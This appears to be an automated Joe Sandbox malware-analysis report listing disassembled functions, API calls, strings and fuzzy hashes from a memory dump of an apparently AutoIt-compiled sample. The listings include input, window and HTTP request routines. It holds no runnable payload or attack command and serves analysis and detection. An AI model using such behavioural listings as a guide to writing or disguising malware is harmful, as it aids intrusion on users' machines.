Part of subcall function 012C912D: GetAsyncKeyState.USER32 ref: 012C919D

ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?,?), ref: 01348B6B
ImageList_EndDrag.COMCTL32 ref: 01348B71
ReleaseCapture.USER32 ref: 01348B77
SetWindowTextW.USER32 ref: 01348C12
SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 01348C25
DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?,?), ref: 01348CFF

Strings

@GUI_DRAGFILE, xrefs: 01348C9A
8lr, xrefs: 01348BB4, 01348BEE
@GUI_DROPID, xrefs: 01348C51

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
String ID: 8lr$@GUI_DRAGFILE$@GUI_DROPID
API String ID: 1924731296-152341648
Opcode ID: b75ddcf63803bd6cb6a834fe8fd7ee0cd696770b6c4d36826dd8fd5819e055bc
Instruction ID: 4ef3fc7d897e2fd7b6e2e1f009a44dab0e44b120b0d1b3a34f8cae7708cd4238
Opcode Fuzzy Hash: b75ddcf63803bd6cb6a834fe8fd7ee0cd696770b6c4d36826dd8fd5819e055bc
Instruction Fuzzy Hash: CC519E74105304AFEB10EF64C895FBE7BE8FB98758F00066DFA5657290CB71A944CB92

Uniqueness

Uniqueness Score: -1.00%

Function 01323388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 013233CF

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 013233F0

Strings

Line %d (File "%s"):, xrefs: 01323443, 0132345C
Error: , xrefs: 013234D1
"%s" (%d) : ==> %s:%s%s, xrefs: 01323504
"%s" (%d) : ==> %s:, xrefs: 01323522
^ ERROR , xrefs: 0132349E
Incorrect parameters to object property !, xrefs: 013234AB

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: d87cbd59eb5925d599a4e68e95a0231b99d80140360bc09ed0c2f672d3dd06f3
Instruction ID: 3535cf25cd8376e3c910db99c728fb5db02437632a2ebd0b5d5bfbacc28e7efa
Opcode Fuzzy Hash: d87cbd59eb5925d599a4e68e95a0231b99d80140360bc09ed0c2f672d3dd06f3
Instruction Fuzzy Hash: DA51BF7180021AABDF25EBA4CD91EFEB779BF28388F204165E10572150EB356F98CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0131B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0131B5FC
_wcslen.LIBCMT ref: 0131B608
_wcslen.LIBCMT ref: 0131B64D
_wcslen.LIBCMT ref: 0131B68C
_wcslen.LIBCMT ref: 0131B6C7

Strings

APPEND, xrefs: 0131B6C1, 0131B6C6
EXISTS, xrefs: 0131B686, 0131B68B
KEYS, xrefs: 0131B647, 0131B64C
REMOVE, xrefs: 0131B602, 0131B607

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: ee05e92d32d522b1a8fb52014716211862159c044034d1197f37b3b221219a06
Instruction ID: 8538639aa5b1b6e3ad69c3fbd2b715750e83b0cad90994df93dcde52aba7a210
Opcode Fuzzy Hash: ee05e92d32d522b1a8fb52014716211862159c044034d1197f37b3b221219a06
Instruction Fuzzy Hash: 2441F832A001679BCB246F7DC8A05BEFBB5AF706BCB244529E561D728CF635C981C790

Uniqueness

Uniqueness Score: -1.00%

Function 01325393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 013253A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 01325416
GetLastError.KERNEL32 ref: 01325420
SetErrorMode.KERNEL32(00000000,READY), ref: 013254A7

Strings

NOTREADY, xrefs: 0132544B
READONLY, xrefs: 01325452
INVALID, xrefs: 01325459
READY, xrefs: 01325460, 01325468
UNKNOWN, xrefs: 01325444

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 5dcf7c604ce073796274f9e001888616c2477ff9134c6449f8188edeb31ae590
Instruction ID: 40869c2512a05a455d40ae6ada1da75eb9d83c7bf364ea48277766898b1cf205
Opcode Fuzzy Hash: 5dcf7c604ce073796274f9e001888616c2477ff9134c6449f8188edeb31ae590
Instruction Fuzzy Hash: 8931B375A001159FE710EF68C484AE9BBB8FF4430DF048056E505EB292DB71EE46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0131B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32(?,?,?,?,?,0131A1E1,?,00000001), ref: 0131B151
GetForegroundWindow.USER32 ref: 0131B165
GetWindowThreadProcessId.USER32(00000000), ref: 0131B16C
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0131B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0131B18D
AttachThreadInput.USER32(?,00000000,00000001), ref: 0131B1A6
AttachThreadInput.USER32(00000000,00000000,00000001), ref: 0131B1B8
AttachThreadInput.USER32(00000000,00000000), ref: 0131B1FD
AttachThreadInput.USER32(?,?,00000000), ref: 0131B212
AttachThreadInput.USER32(00000000,?,00000000), ref: 0131B21D

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 4d3befa778a0231818fbe887823864c440c9782ac31668eefc22b796eb4aac8e
Instruction ID: 562c4b79ef2c535cedd17ffbde2d1fd70faf98d987bb44f7312362d7420d0be5
Opcode Fuzzy Hash: 4d3befa778a0231818fbe887823864c440c9782ac31668eefc22b796eb4aac8e
Instruction Fuzzy Hash: 9631AEB5501304AFEB259F68D848FEDBBBDBB55719F148014FA02D628CDBB4E9068B60

Uniqueness

Uniqueness Score: -1.00%

Function 012E2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 012E2C94

Part of subcall function 012E29C8: HeapFree.KERNEL32(00000000,00000000), ref: 012E29DE
Part of subcall function 012E29C8: GetLastError.KERNEL32(00000000,?,012ED7D1,00000000,00000000,00000000,00000000,?,012ED7F8,00000000,00000007,00000000,?,012EDBF5,00000000,00000000), ref: 012E29F0

_free.LIBCMT ref: 012E2CA0
_free.LIBCMT ref: 012E2CAB
_free.LIBCMT ref: 012E2CB6
_free.LIBCMT ref: 012E2CC1
_free.LIBCMT ref: 012E2CCC
_free.LIBCMT ref: 012E2CD7
_free.LIBCMT ref: 012E2CE2
_free.LIBCMT ref: 012E2CED
_free.LIBCMT ref: 012E2CFB

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 51f34db92c4fc83f3518c92db6eb373499258c3864e2ae28aafc53c55b5d860c
Instruction ID: 073d5fb1adc1c1d93360c5f74826735809a64857e972e4ca7c3f87cf30fbf2f1
Opcode Fuzzy Hash: 51f34db92c4fc83f3518c92db6eb373499258c3864e2ae28aafc53c55b5d860c
Instruction Fuzzy Hash: B211E97612010DFFCB02EF54D845DED3BA9FF15290B926494FA495F220D635EE509B90

Uniqueness

Uniqueness Score: -1.00%

Function 012B1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 012B1459
OleUninitialize.OLE32 ref: 012B14F8
UnregisterHotKey.USER32(?), ref: 012B16DD
DestroyWindow.USER32 ref: 012F24B9
FreeLibrary.KERNEL32(?), ref: 012F251E
VirtualFree.KERNEL32(?,00000000,00008000), ref: 012F254B

Strings

close all, xrefs: 012B1454

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: af1828bab3352b18dea7d6cb4c2dd1d7ca127bab6f4f9dcb41392bd9d21434a8
Instruction ID: 94c68efb03410fbb2f59b0991a970759d53e4820f75f9b60d01fe6a272fe35a9
Opcode Fuzzy Hash: af1828bab3352b18dea7d6cb4c2dd1d7ca127bab6f4f9dcb41392bd9d21434a8
Instruction Fuzzy Hash: 66D14A31622213CFDB29EF18E5A8A69F7A5BF15744F1442ADD64A6B251CB30EC22CF50

Uniqueness

Uniqueness Score: -1.00%

Function 01327DF0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 01327FAD
SetCurrentDirectoryW.KERNEL32(?), ref: 01327FC1
GetFileAttributesW.KERNEL32(?), ref: 01327FEB
SetFileAttributesW.KERNEL32(?,00000000), ref: 01328005
SetCurrentDirectoryW.KERNEL32(?), ref: 01328017
SetCurrentDirectoryW.KERNEL32(?), ref: 01328060
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 013280B0

Strings

*.*, xrefs: 01328066

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 83321da609ec358ed66b4f9e4799814cbc892f2a8a82a6404e8d9895b15ee71e
Instruction ID: 6d654a7b9a8269eda47d629f6e52fc8fa7508815ad4863134d8599297d51ffa5
Opcode Fuzzy Hash: 83321da609ec358ed66b4f9e4799814cbc892f2a8a82a6404e8d9895b15ee71e
Instruction Fuzzy Hash: A081C1725142559BDB20FF18C4849BEB7E8BFA8358F144C2EF989C7250E734E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 012B5BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32 ref: 012B5C7A

Part of subcall function 012B5D0A: GetClientRect.USER32 ref: 012B5D30
Part of subcall function 012B5D0A: GetWindowRect.USER32(?,?), ref: 012B5D71
Part of subcall function 012B5D0A: ScreenToClient.USER32(?,?), ref: 012B5D99

GetDC.USER32 ref: 012F46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 012F4708
SelectObject.GDI32(00000000,00000000), ref: 012F4716
SelectObject.GDI32(00000000,00000000), ref: 012F472B
ReleaseDC.USER32(?,00000000), ref: 012F4733
MoveWindow.USER32(?,?,?,?,?,?), ref: 012F47C4

Strings

U, xrefs: 012F4693

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c81bb85e64699c330a42e26fe6cf13833b510aeb7877c967d16b4ad3ea7c9a8e
Instruction ID: 74bcd4dd4e65dfe765ca3c9c8899e7a840df3b167913a7b0ba80a9004666cd50
Opcode Fuzzy Hash: c81bb85e64699c330a42e26fe6cf13833b510aeb7877c967d16b4ad3ea7c9a8e
Instruction Fuzzy Hash: C871F030410246DFCF26AF68C984AFBBBB6FF49360F084279EB515A16AC7B09841CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0132359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 013235E4

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

LoadStringW.USER32(01382390,?,00000FFF,?), ref: 0132360A

Strings

Line %d (File "%s"):, xrefs: 0132366B
Error: , xrefs: 013236EF
^ ERROR, xrefs: 013236C9
"%s" (%d) : ==> %s:%s%s, xrefs: 01323724
"%s" (%d) : ==> %s:, xrefs: 01323742

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: 1c4595de8d48bd463e1cb8e1144ec4a4b62fcb7cf0885dd18193e5f6f2524693
Instruction ID: 42b38309dc0a95d76c78205f83b112c4b568fb56223deee358f6719efac86944
Opcode Fuzzy Hash: 1c4595de8d48bd463e1cb8e1144ec4a4b62fcb7cf0885dd18193e5f6f2524693
Instruction Fuzzy Hash: 9F518F7180021ABBDF25EBA4CC91EFEBB79BF24348F144125E20572154EB352AD9DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 01342DFD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 01342E1C
GetWindowLongW.USER32(00000000,000000F0), ref: 01342E4F
GetWindowLongW.USER32(00000000,000000F0), ref: 01342E84
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 01342EB6
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 01342EE0
GetWindowLongW.USER32(00000000,000000F0), ref: 01342EF1
SetWindowLongW.USER32 ref: 01342F0B

Strings

8lr, xrefs: 01342E00, 01342E34, 01342E69, 01342EA1, 01342EC5, 01342EFD

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID: 8lr
API String ID: 2178440468-2725927297
Opcode ID: eb3daa1c778bc0fd067e166a2b8db9da63986460be5483ef7c11f34d06fab9df
Instruction ID: 885c73834ae952985f9648866bbbfae10f3cf0f6977c8ce8a353155af39032e6
Opcode Fuzzy Hash: eb3daa1c778bc0fd067e166a2b8db9da63986460be5483ef7c11f34d06fab9df
Instruction Fuzzy Hash: 263119346052409FDB31CF5CEC84F6A77E8EB49724F151164F9189B2A6CB71B881DB40

Uniqueness

Uniqueness Score: -1.00%

Function 0132C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0132C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0132C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0132C2CA
GetLastError.KERNEL32 ref: 0132C322
SetEvent.KERNEL32(?), ref: 0132C336
InternetCloseHandle.WININET(00000000), ref: 0132C341

Strings

, xrefs: 0132C2BB

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 5f51090763afbd898f0161ba6aa7b7ae8ba706fe224ee55ab1c728604543edd8
Instruction ID: 7a16606cf45d862cbb5bc3af329daeff13b5cd8ed6ef14e9fd9aaf0ca39692cb
Opcode Fuzzy Hash: 5f51090763afbd898f0161ba6aa7b7ae8ba706fe224ee55ab1c728604543edd8
Instruction Fuzzy Hash: AD31A271500718AFEB31EF68C888AAF7BFCEB49748F04591DE546D3200DB75EA448B60

Uniqueness

Uniqueness Score: -1.00%

Function 0131989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,012F3AAF,?,?,Bad directive syntax error,0134CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 013198BC
LoadStringW.USER32(00000000,?,012F3AAF,?), ref: 013198C3

Part of subcall function 012B9CB3: _wcslen.LIBCMT ref: 012B9CBD

MessageBoxW.USER32 ref: 01319987

Strings

Line %d (File "%s"):, xrefs: 0131992D
Line %d:, xrefs: 01319912
%s (%d) : ==> %s.: %s %s, xrefs: 013198F1
., xrefs: 0131996D
Error: , xrefs: 01319955

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 99e6590f6cac9c1317648d4ad305dd3cf62723bb862e9594879659fc6e21d444
Instruction ID: 13f61927f75366b734ab50578beb1c87027aac974c4d63c8af1f580b68216631
Opcode Fuzzy Hash: 99e6590f6cac9c1317648d4ad305dd3cf62723bb862e9594879659fc6e21d444
Instruction Fuzzy Hash: 21218D7181021AABDF25EF90CC55EFE7B7ABF28348F044419F61566160EB35A658CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0131209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 013120AB
GetClassNameW.USER32(00000000,?,00000100), ref: 013120C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0131214D

Strings

smallicons, xrefs: 01312115
SHELLDLL_DefView, xrefs: 013120CC
list, xrefs: 0131212F
details, xrefs: 013120FB
largeicons, xrefs: 013120E1

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: 0f46e5f39ccc4b926d40ad5de994da7fa1d8c89df0dea89189123807b278d94b
Instruction ID: b44b7aa0e7117e9dfd0bbd852d28cc20932ad2d59fb5507bb68c380d87d651de
Opcode Fuzzy Hash: 0f46e5f39ccc4b926d40ad5de994da7fa1d8c89df0dea89189123807b278d94b
Instruction Fuzzy Hash: 31113A7E684307BAF61DA224DC06DBB339CDB0522CF30502AFB04A4199FF6568014A14

Uniqueness

Uniqueness Score: -1.00%

Function 012ECE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 012ECEB7
_free.LIBCMT ref: 012ECF22
_free.LIBCMT ref: 012ECF48
_free.LIBCMT ref: 012ECF71
_free.LIBCMT ref: 012ECFA9
_free.LIBCMT ref: 012ECFDA
_free.LIBCMT ref: 012ED01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 012ED09C
_free.LIBCMT ref: 012ED0B5

Memory Dump Source

Source File: 00000005.00000002.352096721.00000000012B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000005.00000002.352094467.00000000012B0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.000000000134C000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352105570.0000000001372000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352111889.000000000137C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.352114385.0000000001384000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_12b0000_fredchungel99962.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: cde16abf8bf6a712a1c86e673546d9ecb663bd4a1e5d854c7a7b9898fe1c4bf2
Instruction ID: 31c39ecec9656000da9d9d3244ab454f57640f72d56d547e79653a566ca43723
Opcode Fuzzy Hash: cde16abf8bf6a712a1c86e673546d9ecb663bd4a1e5d854c7a7b9898fe1c4bf2
Instruction Fuzzy Hash: FF616972924306AFDB35AFF8D88CA7D7FD8AF01360F84416EFA0597242D635991587A0

Uniqueness

Uniqueness Score: -1.00%

Function 012C8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32 ref: 01306890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 013068A9
LoadImageW.USER32 ref: 013068B9
